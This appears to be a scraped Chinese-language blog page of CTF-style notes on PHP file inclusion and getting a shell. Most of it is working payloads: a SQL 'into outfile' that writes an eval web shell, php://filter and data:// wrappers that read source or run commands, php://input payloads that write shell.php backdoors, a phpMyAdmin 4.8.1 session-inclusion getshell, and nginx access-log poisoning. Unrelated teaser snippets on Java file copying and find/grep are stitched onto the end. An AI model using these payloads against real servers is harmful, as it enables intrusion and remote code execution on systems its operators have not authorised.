select "<?php @eval($_post['#@!']);?>" into outfile "/tmp/muma.php"
page=/tmp/muma.php
data://text/plain,%3c?php%20$a_code%20=%20file_get_contents(%27fl4gisisish3r3.php%27);echo%20htmlspecialchars($a_code)?%3e:
1、phpmyadmin 4.8.1 檔案包含,包含sessiongetshellselect "<?php file_put_contents('she.php','<?php @eval($_post[cmd]); ?>'); ?>"
讀取檔案
php://filter/read=convert.base64-encode/resource=
寫入內容
data:text/plain,<?php system(ls)?>
data:text/plain;base64,pd9wahagcghwaw5mbygpoz8+
查詢目錄下所有檔案
data://text/plain,<?php print_r(glob("*")); ?>
寫入shell
file=php://input
<?php fputs(fopen('shell.php','w'),'<?php @eval($request[cmd])?>');?>
url=data:text/plain,<?php fputs(fopen("shell.php","w"),"<?php eval(\$_post['hack']);?>")?>
檔案包含及日誌注入:
url=../../../var/log/nginx/access.log
可通過抓包檢視得知伺服器為ubuntu,由nginx搭建的**,nginx的日誌檔案預設位址在/var/log/nginx/access.log和/var/log/nginx/error.log,其中本題中access.log可以開啟
檢視日誌得知查詢的內容均寫入日誌中,因此bp抓包提交payload,意見連線
../../../var/log/nginx/access.log
<?php @eval($_request[cmd]);?>
get方式上傳shell時候需要抓包刪除@
比如:/<?php @eval($_request[cmd]);?>,之後抓包刪除@
/?url=../../../var/log/nginx/access.log
java 檔案複製 包含Excel型別等
將指定路徑下的檔案複製到指定資料夾中 關於檔案的複製 public class copyfile 將指定路徑下的檔案複製到指定資料夾中 public void copyfiles 複製後檔案的路徑與命名 string copiedfilepath copiedfolderpath template....
php檔案包含有關內容
php中引起檔案包含漏洞的4個函式 include include once require require once 本地檔案包含遠端檔案包含,需要php.ini中配置allow url fopen on,allow url include on 1 讀檔案 2 寫檔案 1 input條件 all...
find命令查詢包含指定內容的檔案
前端時間一直在思索如何查詢包含指定內容的檔案,但是一直苦思不得其解。後來范縣問題的原因在於對linux的管道 的理解不夠徹底。咱一直以為查詢當前目錄內包含x的查詢方式是 find grep x 後來檢視多方資料發現,應該是 find exec grep x 或者 find xargs grep x ...